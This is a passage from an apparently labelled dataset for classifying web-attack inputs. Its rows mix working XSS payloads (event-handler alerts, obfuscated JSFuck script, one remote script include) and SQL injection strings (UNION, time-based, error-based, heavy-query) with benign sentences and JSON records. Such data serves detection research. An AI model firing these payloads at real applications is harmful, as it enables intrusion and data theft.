onload=alert(1)></thead>,1,XSS,8914 "<samp draggable=""true"" ondragleave=""alert(1)"">test</samp>",1,XSS,4153 "-7971 ) ) as armw where 9474 = 9474 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,16099 "1' in boolean mode ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) #",2,SQLi,14295 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--",2,SQLi,14154 "{""id"":null,""name"":""grow""}",3,normal,27171 "1' ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13526 "1"" ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ""bfko"" = ""bfko",2,SQLi,10337 or 'unusual' = 'unusual',2,SQLi,21169 Select reset.,3,normal,24628 "1%' or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and '%' = '",2,SQLi,13228 "<canvas onpaste=""alert(1)"" contenteditable>test</canvas>",1,XSS,4323 "<noscript onkeydown=""alert(1)"" contenteditable>test</noscript>",1,XSS,3163 <b id=x tabindex=1 onbeforedeactivate=alert(1)></b><input autofocus>,1,XSS,2632 "When choosing colored linens, you should select a color that compliments the color of your dinnerware and the décor of your home.",3,normal,25162 <td onfocusout=alert(1) tabindex=1 id=x></td><input autofocus>,1,XSS,3176 "<script a="">'>"" SRC=""http://www.securitycompass.com/xss.js""></script>",1,XSS,2567 Select there.,3,normal,24486 "-3596' ) union all select 5349,5349,5349,5349,5349,5349#",2,SQLi,17611 "And then when our customers select their profile, they select one or more different beers.",3,normal,26367 "With few exceptions tapeworms select the small intestine for their station, and in this situation execute active movements of extension and contraction.",3,normal,25118 "1' ) ) as fwhv where 3921 = 3921 union all select null,null--",2,SQLi,17024 "<div id=""130""><math href=""javascript:alert(130)"">CLICKME</math>",1,XSS,3116 "-6770"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric )",2,SQLi,10857 You can select.,3,normal,24802 1' ) ) or sleep ( 5 ) and ( ( 'zxik' = 'zxik,2,SQLi,19136 select ( case when ( 9299 = 2760 ) then 1 else 9299* ( select 9299 from master..sysdatabases ) end ) --,2,SQLi,13944 1' ) as rhvm where 1420 = 1420,2,SQLi,20557 &lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;,1,XSS,2462 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) ) +'",2,SQLi,14938 "1'|| ( select 'frrk' from dual where 3145 = 3145 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) ) ||'",2,SQLi,11834 The Financial Select Sector SPDR Fund rallied 18 percent since Nov.,3,normal,25449 <script>javascript:alert(1)</script\x0B,1,XSS,8095 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) -- sztf",2,SQLi,17765 1 ) where 7552 = 7552 order by 1#,2,SQLi,20199 <button onMouseLeave=javascript:alert(1)>,1,XSS,7801 <ul onpointermove=alert(1)>XSS</ul>,1,XSS,9000 "1"" or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,12910 Select a topic for the discussion.,3,normal,24128 "<data onmouseleave=""alert(1)"">test</data>",1,XSS,7779 "1 ) where 8856 = 8856 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14225 "-4739' ) ) union all select 6585,6585,6585,6585,6585--",2,SQLi,17998 "1"" ) ) as tjdz where 8656 = 8656 union all select null,null,null,null,null--",2,SQLi,15513 "{""id"":null,""firstName"":""Kirin"",""lastName"":""Swatan"",""address"":"" 2 KALLANG AVENUE, #02-152A"",""city"":""513"",""telephone"":""2686692741""}",3,normal,27233 "perl -e 'print \""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>\"";' > out",1,XSS,3142 "1"" ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ""thkh"" like ""thkh",2,SQLi,12496 "<a href=""jAvAsCrIpT&colon;alert&lpar;1&rpar;"">X</a>",1,XSS,5340 1 ) as ryks where 1196 = 1196,2,SQLi,20745 "1' ) union all select null,null,null,null,null,null,null,null#",2,SQLi,16955 "<blink onmouseleave=""alert(1)"">test</blink>",1,XSS,7121 <strong onpointerenter=alert(1)>XSS</strong>,1,XSS,6940 "1"" ) as lexx where 2892 = 2892 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,16434 "-1425"" ) where 8056 = 8056 or elt ( 1032 = 1032,3623 ) --",2,SQLi,17475 "<element onkeyup=""alert(1)"" contenteditable>test</element>",1,XSS,3920 <tbody id=x tabindex=1 onfocusin=alert(1)></tbody>,1,XSS,5531 <param id=x tabindex=1 onactivate=alert(1)></param>,1,XSS,5400 "1 ) as ewnv where 3393 = 3393 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11384 1'+ ( select 'iyyv' where 9500 = 9500 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) ) +',2,SQLi,14404 "1' ) where 2284 = 2284 and make_set ( 8403 = 8403,8899 ) --",2,SQLi,17309 -3359' order by 1--,2,SQLi,21955 "-4546' ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,10764 "1"" ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,16845 "<bdi onmousedown=""alert(1)"">test</bdi>",1,XSS,8323 "-4373'+ ( select 'rlht' where 2285 = 2285 union all select 2285,2285,2285#",2,SQLi,15723 "1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'swjk' = 'swjk",2,SQLi,11136 "<p onbeforepaste=""alert(1)"" contenteditable>test</p>",1,XSS,5271 <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>,1,XSS,1863 "1%' ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and '%' = '",2,SQLi,10915 "{""id"":null,""firstName"":""Amilia"",""lastName"":""Sc"",""address"":""500 NORTH A STREET, RICHMOND IN 47374"",""city"":""281"",""telephone"":""5428406052""}",3,normal,27445 -1386' ) or ( 7880 = 5362 ) *5362 and ( 'vsyu' like 'vsyu,2,SQLi,17512 <ol onpointerout=alert(1)>XSS</ol>,1,XSS,9228 <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>,1,XSS,3 "/></a></><img src=1.gif onerror=alert(1)>window.alert(Bonjour !"");",1,XSS,2708 "1'|| ( select 'nzjz' where 3539 = 3539 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13351 "1' ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( 'gfxr' = 'gfxr",2,SQLi,10715 <tt onpointerout=alert(1)>XSS</tt>,1,XSS,9199 "<spacer onmousedown=""alert(1)"">test</spacer>",1,XSS,6960 "setTimeout(function() {document.body.style.backgroundColor = 'red';}, 2000); ",1,XSS,2157 1%' ) and 4061 = 2730#,2,SQLi,21404 "<mark draggable=""true"" ondragleave=""alert(1)"">test</mark>",1,XSS,4013 It was not an easy process to select the winners.,3,normal,25954 "<style>:target {transform: rotate(180deg);}</style><frameset id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></frameset>",1,XSS,536 "1'|| ( select 'wtdz' from dual where 1866 = 1866 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,11986 "<noscript onmouseleave=""alert(1)"">test</noscript>",1,XSS,5825 "1"" ) and make_set ( 4553 = 8132,8132 ) and ( ""pfci"" like ""pfci",2,SQLi,16993 "1'|| ( select 'osty' from dual where 6433 = 6433 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ) ||'",2,SQLi,11899 "1' ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( 'wgpg' like 'wgpg",2,SQLi,12376 "1 ) as wokl where 1368 = 1368 union all select null,null,null,null,null,null--",2,SQLi,15347 Create site.,3,normal,23104 "iif ( 9229 = 4158,1,1/0 )",2,SQLi,21135 Join the conversation now.,3,normal,22580 <dir onpointerover=alert(1)>XSS</dir>,1,XSS,8686 "x=""&quot;,alert(1)//"";",1,XSS,9746 "1 where 7362 = 7362 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14284 1 ) ) as hxtp where 5478 = 5478 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,15148 "<p onmouseleave=""alert(1)"">test</p>",1,XSS,9091 "1%"" ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ""%"" = """,2,SQLi,16586 <wbr id=x tabindex=1 onfocusin=alert(1)></wbr>,1,XSS,6466 She'll select her dress.,3,normal,24322 "-5587%' ) or elt ( 1032 = 1032,3623 ) and ( '%' = '",2,SQLi,18324 "<form ondblclick=""alert(1)"">test</form>",1,XSS,8110 select 'qqpjq'|| ( select ( case when ( 2933 = 2933 ) then 1 else 0 end ) ) ||'qzvzq',2,SQLi,14928 &lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;,1,XSS,1912 Aggregate data where necessary.,3,normal,23349 "iif ( 8214 = 4954,1,1/0 )",2,SQLi,21066 "-8869"" where 3019 = 3019 union all select 3019,3019,3019#",2,SQLi,17541 ý or 1 = 1 --,2,SQLi,22135 1' where 6168 = 6168,2,SQLi,21796 "<style>@keyframes x{}</style><plaintext style=""animation-name:x"" onanimationend=""alert(1)""></plaintext>",1,XSS,1319 "<span onbeforecut=""alert(1)"" contenteditable>test</span>",1,XSS,4370 <%<!--'%><script>alert(1);</script -->,1,XSS,8316 """;waitfor delay '0:0:__TIME__'--",2,SQLi,20238 -1468' ) ) ) or 4875 = 6163#,2,SQLi,20816 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4-- sapi",2,SQLi,13878 <img src=x:alert(alt) onerror=eval(src) alt=xss>,1,XSS,6082 "x' AND email IS NULL, --",2,SQLi,21183 "&lt;A HREF=\""http&#58;//66&#46;102&#46;7&#46;147/\""&gt;XSS&lt;/A&gt;",1,XSS,2603 "<strike onmouseenter=""alert(1)"">test</strike>",1,XSS,6571 1' ) ) as hzbj where 1725 = 1725 or sleep ( 5 ) #,2,SQLi,18581 But I was always one of a select few black students.,3,normal,26316 "1"" ) where 7010 = 7010 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12770 )%20waitfor%20delay%20'0:0:20'%20/*,2,SQLi,20013 "1%"" and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ""%"" = """,2,SQLi,13300 <tbody onpointerout=alert(1)>XSS</tbody>,1,XSS,7998 <button onMove=javascript:alert(1)>,1,XSS,9145 "<embed draggable=""true"" ondragstart=""alert(1)"">test</embed>",1,XSS,3770 "<DIV STYLE=""width:expression(javascript:alert(1));"">",1,XSS,5079 "If you want to allow presenters to record your meeting, select Presenters can record the meeting.",3,normal,26046 <x oncopy=alert(1)>copy this!,1,XSS,9602 `'><script>\xE514\x9A\x80javascript:alert(514)</script>,1,XSS,4633 """My tank's for utilitarian purposes,"" he told Select in 20143.",3,normal,26460 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><form id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></form>",1,XSS,242 "-2857%' ) ) ) union all select 7167,7167,7167,7167,7167,7167,7167,7167#",2,SQLi,16077 "1%' ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15448 "Virginia and Maryland promised such a cession; President Washington was known to be in favour of a site on the Potomac, and in July 1790 Alexander Hamilton, in return for Thomas Jefferson's assistance in passing the bill for the assumption of the state war debts by the Federal government, helped Jefferson to pass a bill for establishing the capital on the Potomac, by which the president was authorized to select a site anywhere along the Potomac between the Eastern Branch (Anacostia) and the Conococheague river, a distance of about So m., and to appoint three commissioners who under his direction should make the necessary surveys and provide accommodations for the reception of Congress in r800.",3,normal,25188 -8615 ) ) ) or 4039 = 9144,2,SQLi,21011 "1"" and 7533 = 7533",2,SQLi,22071 "1' ) as uvxl where 6211 = 6211 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,11485 <input onpointerenter=alert(1)>XSS</input>,1,XSS,7468 "<META HTTP-EQUIV=\""refresh\"" CONTENT=\""0; URL=http://;URL=javascript:alert('XSS');\"">",1,XSS,1869 else dbms_lock.sleep ( 0 ),2,SQLi,21004 "select sleep ( 5 ) and ( ( ( ""uvzc"" like ""uvzc",2,SQLi,18976 <hgroup onfocusout=alert(1) tabindex=1 id=x></hgroup><input autofocus>,1,XSS,2523 AnD SLEEP(5)#,2,SQLi,22258 "<marquee onScroll marquee onScroll=""javascript:javascript:alert(1)""></marquee onScroll>",1,XSS,1822 "<a href=""javas\x01cript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2412 "<samp onmouseout=""alert(1)"">test</samp>",1,XSS,8246 <rp id=x tabindex=1 onactivate=alert(1)></rp>,1,XSS,6640 "-2241 ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( 6840 = 6840",2,SQLi,16600 "<body onkeypress=""alert(1)"" contenteditable>test</body>",1,XSS,4567 "1' ) where 6328 = 6328 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14941 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( ""%"" = """,2,SQLi,13953 Select your fashion.,3,normal,24892 "<noscript onmouseup=""alert(1)"">test</noscript>",1,XSS,6393 "><script>alert(XSS by \nxss"")</script>><marquee><h1>XSS by xss</h1></marquee>",1,XSS,2120 1'|| ( select 'brde' where 7390 = 7390 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ||',2,SQLi,10074 "<table draggable=""true"" ondragstart=""alert(1)"">test</table>",1,XSS,3781 "Tap on ""see more,"" then select the SmileCode Scanner option.",3,normal,25508 "<kbd draggable=""true"" ondragend=""alert(1)"">test</kbd>",1,XSS,4963 "<fieldset draggable=""true"" ondragenter=""alert(1)"">test</fieldset>",1,XSS,2811 "><h1><IFRAME width=""420"" height=""315"" frameborder=""0"" onmouseover=""document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr",1,XSS,500 "1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,11469 "<style>:target {color: red;}</style><aside id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></aside>",1,XSS,920 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ""swec"" like ""swec",2,SQLi,13414 "1%"" ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13288 "<hgroup onpaste=""alert(1)"" contenteditable>test</hgroup>",1,XSS,4286 "Other deals include $303 off select Playstation 4 consoles, up to $150 off select Xbox consoles, and a $25 gift coupon when you buy the Nintendo Switch.",3,normal,25806 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><slot id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></slot>",1,XSS,230 She'll select her hairstyle.,3,normal,24356 ) or ( 'a' = 'a,2,SQLi,22165 "<template onbeforepaste=""alert(1)"" contenteditable>test</template>",1,XSS,2743 "1"" or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ""ljkg"" = ""ljkg",2,SQLi,13353 "1%"" ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11727 "1%"" ) ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( ""%"" = """,2,SQLi,14372 "<xmp onclick=""alert(1)"">test</xmp>",1,XSS,9274 "1"" where 1386 = 1386",2,SQLi,21842 "1 ) ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( 7589 = 7589",2,SQLi,11137 <svg><set onend=alert(1) attributename=x dur=1s>,1,XSS,6003 "<style oncopy=""alert(1)"" contenteditable>test</style>",1,XSS,4899 "<rtc onkeyup=""alert(1)"" contenteditable>test</rtc>",1,XSS,5585 "1"" ) as jngl where 8384 = 8384 and 4580 = 1718--",2,SQLi,18773 <style onpointerout=alert(1)>XSS</style>,1,XSS,7870 1 where 3956 = 3956,2,SQLi,21987 "<style>:target {color:red;}</style><aside id=x style=""transition:color 1s"" ontransitionend=alert(1)></aside>",1,XSS,1130 "1"" and 6637 = 2321",2,SQLi,22060 "1"" ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ""ynde"" = ""ynde",2,SQLi,10424 "<object onbeforeload object onbeforeload=""javascript:javascript:alert(1)""></object onbeforeload>",1,XSS,1569 "1"" ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""zptu"" = ""zptu",2,SQLi,10322 "<style>@keyframes x{}</style><h1 style=""animation-name:x"" onanimationstart=""alert(1)""></h1>",1,XSS,1708 "<script onbeforepaste=""alert(1)"" contenteditable>test</script>",1,XSS,3155 "-2106"" or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ""dvlq"" like ""dvlq",2,SQLi,10388 "( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6130 = 6130,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,11547 <button onSyncRestored=javascript:alert(1)>,1,XSS,7302 begin,3,normal,23166 "{""id"":null,""name"":""Venusaur""}",3,normal,27089 <frameset onpointerover=alert(1)>XSS</frameset>,1,XSS,6242 <x %6Fnxxx=1,1,XSS,9827 "<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""></A>",1,XSS,2927 -3899' ) where 8152 = 8152 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10514 "{""id"":null,""firstName"":""Sally"",""lastName"":""Toh"",""address"":""2184 Worth St"",""city"":""575"",""telephone"":""5184318199""}",3,normal,27285 "1%"" ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( ""%"" = """,2,SQLi,12468 "<;A HREF="";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/"";>;XSS<;/A>;",1,XSS,2723 "<element onclick=""alert(1)"">test</element>",1,XSS,7512 I'm considering where to have a quiet retreat.,3,normal,23989 "admin"") or (""1""=""1""#",2,SQLi,21719 The Utilities Select Sector SPDR (XLU) and Real Estate Select SPDR (XLRE) each have an average dividend yield of 2.9% while the Health Care ETF has a yield of about 1.7%.,3,normal,25365 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( 'atyf' = 'atyf",2,SQLi,13823 1 ) ) as pzoo where 8036 = 8036 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,15178 "{""id"":null,""name"":""plan it""}",3,normal,27559 "-8007' where 9649 = 9649 union all select 9649,9649,9649,9649,9649,9649,9649,9649,9649--",2,SQLi,14807 "select * from users where id = 1 <@. union select 1,version ( ) -- 1",2,SQLi,16368 -8328 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) # rlva,2,SQLi,10856 select ( case when ( 4306 = 2815 ) then 4306 else 1/ ( select 0 ) end ) --,2,SQLi,15773 <del onpointerup=alert(1)>XSS</del>,1,XSS,9056 "<audio autoplay onloadedmetadata=alert(1)> <source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1507 <progress onpointerenter=alert(1)>XSS</progress>,1,XSS,6056 "or ""^",2,SQLi,22542 "<;IMG SRC=`javascript:alert("";RSnake says, ';XSS';"";)`>;",1,XSS,4227 "1"" ) as fcrx where 2929 = 2929 and 2820 = 5133",2,SQLi,18958 "Now, Vevo first asks you to select your favorite music genres.",3,normal,25861 "Select Part Finder, which has a screw as its icon.",3,normal,25619 "<img 